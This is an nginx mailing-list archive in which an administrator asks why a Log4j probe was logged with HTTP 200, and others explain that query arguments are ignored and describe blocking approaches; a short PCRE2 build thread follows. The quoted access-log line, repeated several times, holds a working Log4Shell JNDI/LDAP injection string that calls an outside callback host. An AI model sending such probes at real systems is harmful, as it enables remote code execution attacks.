> Src IP: 166.137.252.110 > Portion of the log(s): > > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" > > > Thank you in advance, > Mauro > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From Justin.Slaughter at charter.com Wed Dec 29 18:12:17 2021 From: Justin.Slaughter at charter.com (Slaughter, Justin D) Date: Wed, 29 Dec 2021 18:12:17 +0000 Subject: [EXTERNAL] Re: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: Message-ID: <26EAC8C1-B851-4551-B4C4-299CCB4A02D4@charter.com> Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". Justin ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. Thank you very much for your reply. I really appreciated it. I?ll wait for the final gurus feedback too. Mauro > On 29 Dec 2021, at 18:03, lists wrote: > > That IP space is certified shady. I detect the occasional hack from them. See > > https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ > > and > > https://wirelessdataspco.org/faq.php > > These wireless companies will do anything for money including leasing their IP space. > > I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. > > I will leave it up to the gurus to parse the log. > > > > > > > Original Message > > > From: mauro.tridici at cmcc.it > Sent: December 29, 2021 6:55 AM > To: nginx at nginx.org > Reply-to: nginx at nginx.org > Subject: Help request about Log4j attack attempts and NGINX logs meaning > > > > > Dear Users, > > > I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. > Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. > In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. > > > At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. > Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. > Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. > > > Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? > > > You can see below the mail notification I received: > > > > Attack Notification. > 2021 Dec 28 20:45:59 > > Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." 
> Src IP: 166.137.252.110 > Portion of the log(s): > > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" > > > Thank you in advance, > Mauro > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx E-MAIL CONFIDENTIALITY NOTICE: The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. From mdounin at mdounin.ru Wed Dec 29 18:29:51 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Wed, 29 Dec 2021 21:29:51 +0300 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Message-ID: Hello! On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: > I have an old instance of NGINX (v.1.10.1) running as proxy > server on a dedicated hardware platform. > Since the proxy service is reachable from internet, it is > constantly exposed to cyber attacks. > In my particular case, it is attacked by a lot of Log4j attack > attempts from several malicious IPs. > > At this moment, an host intrusion detection system (HIDS) is > running and is protecting the NGINX server: it seems it is > blocking every malicious attack attempts. > Anyway, during the last attack mail notification sent by the > HIDS, I noticed that the NGINX server response was ?HTTP/1.1 > 200? and I?m very worried about it. > Log4j and Java packages are NOT installed on the NGINX server > and all the servers behind the proxy are not using Log4j. > > Could you please help me to understand the reason why the NGINX > server answer was ?HTTP/1.1 200?!? > > You can see below the mail notification I received: > > > Attack Notification. > 2021 Dec 28 20:45:59 > > Received From: ?hidden_NGINX_server_IP? > >/var/log/nginx/access.log > Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt > detected." > Src IP: 166.137.252.110 > Portion of the log(s): > > 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET > /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP > ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a > } > HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" As you can see from the log line, the request is to "/" with some additional request arguments ("?sulgz=..."). As unknown request arguments are usually ignored, it is no surprise that such a request results in 200. 
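To illustrate with a deliberately made-up minimal config (not your
actual proxy setup): with a plain static location such as the one
below, the query string plays no part in choosing the file, so
"GET /?sulgz=${jndi:...}" serves the same index.html, and logs the
same 200, as a bare "GET /".

    server {
        listen 80;
        root   /usr/share/nginx/html;

        location / {
            # the ?sulgz=... arguments are ignored when a static
            # file is served
            index index.html;
        }
    }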
-- Maxim Dounin http://mdounin.ru/ From mauro.tridici at cmcc.it Wed Dec 29 18:29:58 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 19:29:58 +0100 Subject: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <26EAC8C1-B851-4551-B4C4-299CCB4A02D4@charter.com> References: <26EAC8C1-B851-4551-B4C4-299CCB4A02D4@charter.com> Message-ID: <70022245-375D-428C-9786-416E79890D84@cmcc.it> Hi Justin, thank you very much for your help. Since I?m a newbie, I would like to ask you additional details in order to ?fix? this behaviour (if it shouuld be fixed). What is the meaning of ?GET /?? Does It mean that the attacker is trying to GET something from the / path of the server (sorry for my stupid question)? How can I check and change the current nginx configuration ? Thank you in advance, Mauro > On 29 Dec 2021, at 19:12, Slaughter, Justin D wrote: > > Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". > > Justin > > ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: > > CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. > > Thank you very much for your reply. I really appreciated it. > I?ll wait for the final gurus feedback too. > > Mauro > >> On 29 Dec 2021, at 18:03, lists wrote: >> >> That IP space is certified shady. I detect the occasional hack from them. See >> >> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ >> >> and >> >> https://wirelessdataspco.org/faq.php >> >> These wireless companies will do anything for money including leasing their IP space. >> >> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. >> >> I will leave it up to the gurus to parse the log. >> >> >> >> >> >> >> Original Message >> >> >> From: mauro.tridici at cmcc.it >> Sent: December 29, 2021 6:55 AM >> To: nginx at nginx.org >> Reply-to: nginx at nginx.org >> Subject: Help request about Log4j attack attempts and NGINX logs meaning >> >> >> >> >> Dear Users, >> >> >> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. >> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. >> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. >> >> >> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. >> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. >> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. >> >> >> Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? >> >> >> You can see below the mail notification I received: >> >> >> >> Attack Notification. >> 2021 Dec 28 20:45:59 >> >> Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log >> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." 
>> Src IP: 166.137.252.110 >> Portion of the log(s): >> >> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> >> Thank you in advance, >> Mauro >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > E-MAIL CONFIDENTIALITY NOTICE: > The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From mauro.tridici at cmcc.it Wed Dec 29 18:34:01 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 19:34:01 +0100 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Message-ID: Helo Maxim, thank you very much for the explanation. In your opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry) or I should simply ignore it? Many thanks again, Mauro > On 29 Dec 2021, at 19:29, Maxim Dounin wrote: > > Hello! > > On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: > >> I have an old instance of NGINX (v.1.10.1) running as proxy >> server on a dedicated hardware platform. >> Since the proxy service is reachable from internet, it is >> constantly exposed to cyber attacks. >> In my particular case, it is attacked by a lot of Log4j attack >> attempts from several malicious IPs. >> >> At this moment, an host intrusion detection system (HIDS) is >> running and is protecting the NGINX server: it seems it is >> blocking every malicious attack attempts. >> Anyway, during the last attack mail notification sent by the >> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >> 200? and I?m very worried about it. >> Log4j and Java packages are NOT installed on the NGINX server >> and all the servers behind the proxy are not using Log4j. >> >> Could you please help me to understand the reason why the NGINX >> server answer was ?HTTP/1.1 200?!? >> >> You can see below the mail notification I received: >> >> >> Attack Notification. >> 2021 Dec 28 20:45:59 >> >> Received From: ?hidden_NGINX_server_IP? >>> /var/log/nginx/access.log >> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >> detected." >> Src IP: 166.137.252.110 >> Portion of the log(s): >> >> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >> } >> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" > > As you can see from the log line, the request is to "/" with some > additional request arguments ("?sulgz=..."). 
As unknown request > arguments are usually ignored, it is no surprise that such a > request results in 200. > > -- > Maxim Dounin > http://mdounin.ru/ > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From lists at lazygranch.com Wed Dec 29 22:13:19 2021 From: lists at lazygranch.com (lists) Date: Wed, 29 Dec 2021 14:13:19 -0800 Subject: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: <70022245-375D-428C-9786-416E79890D84@cmcc.it> Message-ID: "get" is a html verb also known as method. Most URL requests are gets. https://www.w3schools.com/tags/ref_httpmethods.asp https://nordicapis.com/ultimate-guide-to-all-9-standard-http-methods/ I just know the bare essentials and have web pages that look like the 90's era other than using a little HTML5. Having never used "parameters" I couldn't completely answer your initial question. The only thing I use after an URL is the # for anchors. I don't know what your relay is doing. However many implementations of nginx simply ban dubious IP space. You can also force a captcha. I use a low CPU power VPS for my sercer so I just ban dubious IP space. Firewalls are very kind to the CPU but use a lot of memory to hold the IP space designation and port information. At a minimum I would block all of AWS. I have about 40k different CIDRs I block. All hosting companies or VPS. The dumb hackers are simply spraying IP space. You will see the same message again and again. They are just bots. I only have two servers (VPS) and only one with web and email so I have the time to find hackers and block IP space. Once you block AWS the amount of hacking drops dramatically. I use nginx maps to search for "jndi" and then 444 the requests. I first made sure "jndi" didn't appear by accident in any pages I created. I have scripts to pull all the IPs for 444 returns from the access logs and feed them to a website to look up who controls the IP space. If it is a server or VPS the entire associated IP space gets banned using bgp.hp.net to find the CIDRs. I do this about every two to three weeks since I have so few hack attempts that get past the firewall. Maybe 200 that get past the blocking and 4 to 6 new servers to add to the list. Log4j has two IPs to investigate so I have to handle them by hand unless I can write a better script to get the return IP address. In two weeks I only had three IPs sending Log4j attacks. If you don't want to create your own list of shady IPs there are services that will feed your server firewall IPs to block in real time. I prefer to have total control. ? Original Message ? From: mauro.tridici at cmcc.it Sent: December 29, 2021 10:30 AM To: nginx at nginx.org Reply-to: nginx at nginx.org Subject: Re: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning Hi Justin, thank you very much for your help. Since I?m a newbie, I would like to ask you additional details in order to ?fix? this behaviour? (if it shouuld be fixed). What is the meaning of ?GET /?? Does It mean that the attacker is trying to GET something from the / path of the server (sorry for my stupid question)? How can I check and change the current nginx configuration ? Thank you in advance, Mauro > On 29 Dec 2021, at 19:12, Slaughter, Justin D wrote: > > Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". 
> > Justin > > ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: > >??? CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. > >??? Thank you very much for your reply. I really appreciated it. >??? I?ll wait for the final gurus feedback too. > >??? Mauro > >> On 29 Dec 2021, at 18:03, lists wrote: >> >> That IP space is certified shady. I detect the occasional hack from them. See >> >> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ >> >> and >> >> https://wirelessdataspco.org/faq.php >> >> These wireless companies will do anything for money including leasing their IP space. >> >> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. >> >> I will leave it up to the gurus to parse the log.? >> >> >> >> >> >> >> ? Original Message? >> >> >> From: mauro.tridici at cmcc.it >> Sent: December 29, 2021 6:55 AM >> To: nginx at nginx.org >> Reply-to: nginx at nginx.org >> Subject: Help request about Log4j attack attempts and NGINX logs meaning >> >> >> >> >> Dear Users, >> >> >> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. >> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. >> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. >> >> >> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. >> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. >> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. >> >> >> Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? >> >> >> You can see below the mail notification I received: >> >> >> >> Attack Notification. >> 2021 Dec 28 20:45:59 >> >> Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log >> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." >> Src IP: 166.137.252.110 >> Portion of the log(s): >> >> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> >> Thank you in advance, >> Mauro >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > >??? _______________________________________________ >??? nginx mailing list >??? nginx at nginx.org >??? http://mailman.nginx.org/mailman/listinfo/nginx > > E-MAIL CONFIDENTIALITY NOTICE: > The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. 
If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx _______________________________________________ nginx mailing list nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx From mauro.tridici at cmcc.it Wed Dec 29 22:46:28 2021 From: mauro.tridici at cmcc.it (Mauro Tridici) Date: Wed, 29 Dec 2021 23:46:28 +0100 Subject: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: Message-ID: Many thanks for sharing with me your experience. In the next days, I will try to apply your know-how to my particular case. The HIDS I installed is still blocking the attack attempts, but I have some doubts about the ?best practices? needed for the NGINX ?200? answer. Maxim Dounin kindly said that: "As you can see from the log line, the request is to "/" with some additional request arguments ("?sulgz=..."). As unknown request arguments are usually ignored, it is no surprise that such a request results in 200.? Now, I only need to understand if I can ignore this event or I should do something else. Thank you, Mauro > On 29 Dec 2021, at 23:13, lists wrote: > > "get" is a html verb also known as method. Most URL requests are gets. > > https://www.w3schools.com/tags/ref_httpmethods.asp > > https://nordicapis.com/ultimate-guide-to-all-9-standard-http-methods/ > > I just know the bare essentials and have web pages that look like the 90's era other than using a little HTML5. > > Having never used "parameters" I couldn't completely answer your initial question. The only thing I use after an URL is the # for anchors. > > I don't know what your relay is doing. However many implementations of nginx simply ban dubious IP space. You can also force a captcha. I use a low CPU power VPS for my sercer so I just ban dubious IP space. Firewalls are very kind to the CPU but use a lot of memory to hold the IP space designation and port information. At a minimum I would block all of AWS. I have about 40k different CIDRs I block. All hosting companies or VPS. > > The dumb hackers are simply spraying IP space. You will see the same message again and again. They are just bots. > > I only have two servers (VPS) and only one with web and email so I have the time to find hackers and block IP space. Once you block AWS the amount of hacking drops dramatically. > > I use nginx maps to search for "jndi" and then 444 the requests. I first made sure "jndi" didn't appear by accident in any pages I created. > > I have scripts to pull all the IPs for 444 returns from the access logs and feed them to a website to look up who controls the IP space. If it is a server or VPS the entire associated IP space gets banned using bgp.hp.net to find the CIDRs. I do this about every two to three weeks since I have so few hack attempts that get past the firewall. Maybe 200 that get past the blocking and 4 to 6 new servers to add to the list. > > Log4j has two IPs to investigate so I have to handle them by hand unless I can write a better script to get the return IP address. In two weeks I only had three IPs sending Log4j attacks. > > If you don't want to create your own list of shady IPs there are services that will feed your server firewall IPs to block in real time. I prefer to have total control. 
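As a rough sketch, the "map ... 444" approach quoted above could look something like the lines below (the variable name and the pattern are assumptions made up for this illustration, not taken from the poster's actual configuration, and the pattern should first be checked against legitimate URLs on the site):

    # http{} context: flag any request whose original URI (including the
    # query string) contains the "jndi" lookup marker seen in the probes
    map $request_uri $suspect_jndi {
        default     0;
        "~*jndi"    1;
    }

    # server{} context: close the connection without sending any response
    if ($suspect_jndi) {
        return 444;
    }

Note that 444 is the nginx-specific "close the connection" code, so the probing client gets no reply at all instead of a 200.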
> > > > > > Original Message > > > From: mauro.tridici at cmcc.it > Sent: December 29, 2021 10:30 AM > To: nginx at nginx.org > Reply-to: nginx at nginx.org > Subject: Re: [EXTERNAL] Help request about Log4j attack attempts and NGINX logs meaning > > > Hi Justin, > > thank you very much for your help. > Since I?m a newbie, I would like to ask you additional details in order to ?fix? this behaviour (if it shouuld be fixed). > > What is the meaning of ?GET /?? Does It mean that the attacker is trying to GET something from the / path of the server (sorry for my stupid question)? > How can I check and change the current nginx configuration ? > > Thank you in advance, > Mauro > >> On 29 Dec 2021, at 19:12, Slaughter, Justin D wrote: >> >> Nginx is returning a 200 because the request is a "GET /", and I am assuming your nginx configurations allow GETs to "/". >> >> Justin >> >> ?On 29/12/2021, 10:20 AM, "nginx on behalf of Mauro Tridici" wrote: >> >> CAUTION: The e-mail below is from an external source. Please exercise caution before opening attachments, clicking links, or following guidance. >> >> Thank you very much for your reply. I really appreciated it. >> I?ll wait for the final gurus feedback too. >> >> Mauro >> >>> On 29 Dec 2021, at 18:03, lists wrote: >>> >>> That IP space is certified shady. I detect the occasional hack from them. See >>> >>> https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/ >>> >>> and >>> >>> https://wirelessdataspco.org/faq.php >>> >>> These wireless companies will do anything for money including leasing their IP space. >>> >>> I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers customers. But I am appalled highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them. >>> >>> I will leave it up to the gurus to parse the log. >>> >>> >>> >>> >>> >>> >>> Original Message >>> >>> >>> From: mauro.tridici at cmcc.it >>> Sent: December 29, 2021 6:55 AM >>> To: nginx at nginx.org >>> Reply-to: nginx at nginx.org >>> Subject: Help request about Log4j attack attempts and NGINX logs meaning >>> >>> >>> >>> >>> Dear Users, >>> >>> >>> I have an old instance of NGINX (v.1.10.1) running as proxy server on a dedicated hardware platform. >>> Since the proxy service is reachable from internet, it is constantly exposed to cyber attacks. >>> In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs. >>> >>> >>> At this moment, an host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempts. >>> Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was ?HTTP/1.1 200? and I?m very worried about it. >>> Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j. >>> >>> >>> Could you please help me to understand the reason why the NGINX server answer was ?HTTP/1.1 200?!? >>> >>> >>> You can see below the mail notification I received: >>> >>> >>> >>> Attack Notification. >>> 2021 Dec 28 20:45:59 >>> >>> Received From: ?hidden_NGINX_server_IP? >/var/log/nginx/access.log >>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected." 
>>> Src IP: 166.137.252.110 >>> Portion of the log(s): >>> >>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >>> >>> >>> Thank you in advance, >>> Mauro >>> _______________________________________________ >>> nginx mailing list >>> nginx at nginx.org >>> http://mailman.nginx.org/mailman/listinfo/nginx >> >> >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx >> >> E-MAIL CONFIDENTIALITY NOTICE: >> The contents of this e-mail message and any attachments are intended solely for the addressee(s) and may contain confidential and/or legally privileged information. If you are not the intended recipient of this message or if this message has been addressed to you in error, please immediately alert the sender by reply e-mail and then delete this message and any attachments. If you are not the intended recipient, you are notified that any use, dissemination, distribution, copying, or storage of this message or any attachment is strictly prohibited. >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From nginx-forum at forum.nginx.org Thu Dec 30 04:30:04 2021 From: nginx-forum at forum.nginx.org (George) Date: Wed, 29 Dec 2021 23:30:04 -0500 Subject: nginx-1.21.5 In-Reply-To: References: Message-ID: <9652e941a476ece1dc7951955595f66b.NginxMailingListEnglish@forum.nginx.org> Thanks for PCRE2 support! >From what I read Nginx 1.21.5 will default to PCRE2 if found or fallback to PCRE if not You can disable PCRE2 default by passing --without-pcre2 flag - which works fine and ldd $(which nginx) shows libpcre.so.1 => /usr/local/nginx-dep/lib/libpcre.so.1 (0x00007f86c7445000) But is the same true, if you set --without-pcre flag with PCRE2 library installed and detected? As that seems to end up with nginx failing to configure ./configure: error: the HTTP rewrite module requires the PCRE library. You can either disable the module by using --without-http_rewrite_module option or you have to enable the PCRE support. Why is it looking for PCRE when PCRE2 is available? Posted at Nginx Forum: https://forum.nginx.org/read.php?2,293170,293198#msg-293198 From maxim at nginx.com Thu Dec 30 07:20:50 2021 From: maxim at nginx.com (Maxim Konovalov) Date: Thu, 30 Dec 2021 10:20:50 +0300 Subject: Help request about Log4j attack attempts and NGINX logs meaning In-Reply-To: References: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it> Message-ID: <04357cfc-3b08-62c6-5ed1-3365f99e6697@nginx.com> Mauro, Unless you use somewhere in your stack log4j vulnerable software (nginx is not) I don't see anything significant to worry about. Maxim On 29.12.2021 21:34, Mauro Tridici wrote: > Helo Maxim, > > thank you very much for the explanation. > In your opinion, is this the case to ?fix? this behaviour (but I don?t know how, I?m a newbie, sorry) or I should simply ignore it? > > Many thanks again, > Mauro > >> On 29 Dec 2021, at 19:29, Maxim Dounin wrote: >> >> Hello! 
>> >> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote: >> >>> I have an old instance of NGINX (v.1.10.1) running as proxy >>> server on a dedicated hardware platform. >>> Since the proxy service is reachable from internet, it is >>> constantly exposed to cyber attacks. >>> In my particular case, it is attacked by a lot of Log4j attack >>> attempts from several malicious IPs. >>> >>> At this moment, an host intrusion detection system (HIDS) is >>> running and is protecting the NGINX server: it seems it is >>> blocking every malicious attack attempts. >>> Anyway, during the last attack mail notification sent by the >>> HIDS, I noticed that the NGINX server response was ?HTTP/1.1 >>> 200? and I?m very worried about it. >>> Log4j and Java packages are NOT installed on the NGINX server >>> and all the servers behind the proxy are not using Log4j. >>> >>> Could you please help me to understand the reason why the NGINX >>> server answer was ?HTTP/1.1 200?!? >>> >>> You can see below the mail notification I received: >>> >>> >>> Attack Notification. >>> 2021 Dec 28 20:45:59 >>> >>> Received From: ?hidden_NGINX_server_IP? >>>> /var/log/nginx/access.log >>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt >>> detected." >>> Src IP: 166.137.252.110 >>> Portion of the log(s): >>> >>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET >>> /?sulgz=${jndi:ldap://?hidden_NGINX_server_IP >>> ".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a >>> } >>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" ?-" >> >> As you can see from the log line, the request is to "/" with some >> additional request arguments ("?sulgz=..."). As unknown request >> arguments are usually ignored, it is no surprise that such a >> request results in 200. >> >> -- >> Maxim Dounin >> http://mdounin.ru/ >> _______________________________________________ >> nginx mailing list >> nginx at nginx.org >> http://mailman.nginx.org/mailman/listinfo/nginx > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Maxim Konovalov From mdounin at mdounin.ru Thu Dec 30 08:03:04 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Dec 2021 11:03:04 +0300 Subject: nginx-1.21.5 In-Reply-To: <9652e941a476ece1dc7951955595f66b.NginxMailingListEnglish@forum.nginx.org> References: <9652e941a476ece1dc7951955595f66b.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hello! On Wed, Dec 29, 2021 at 11:30:04PM -0500, George wrote: > Thanks for PCRE2 support! > > From what I read Nginx 1.21.5 will default to PCRE2 if found or fallback to > PCRE if not > > You can disable PCRE2 default by passing --without-pcre2 flag - which works > fine and > > ldd $(which nginx) > > shows > > libpcre.so.1 => /usr/local/nginx-dep/lib/libpcre.so.1 (0x00007f86c7445000) > > But is the same true, if you set --without-pcre flag with PCRE2 library > installed and detected? As that seems to end up with nginx failing to > configure > > ./configure: error: the HTTP rewrite module requires the PCRE library. > You can either disable the module by using --without-http_rewrite_module > option or you have to enable the PCRE support. > > Why is it looking for PCRE when PCRE2 is available? The "--without-pcre" configure option completely disables usage of all versions of the PCRE library, both the original PCRE library and PCRE2. Currently there is not option to disable the original PCRE library while still using PCRE2. 
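In configure terms that corresponds to invocations along these lines (a bare ./configure is shown only for brevity; any other options would be added as usual):

    # PCRE2 installed: nginx 1.21.5 finds and uses it automatically
    ./configure

    # fall back to the original PCRE library even though PCRE2 is installed
    ./configure --without-pcre2

    # disable both PCRE and PCRE2; the rewrite module must then be disabled too
    ./configure --without-pcre --without-http_rewrite_module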
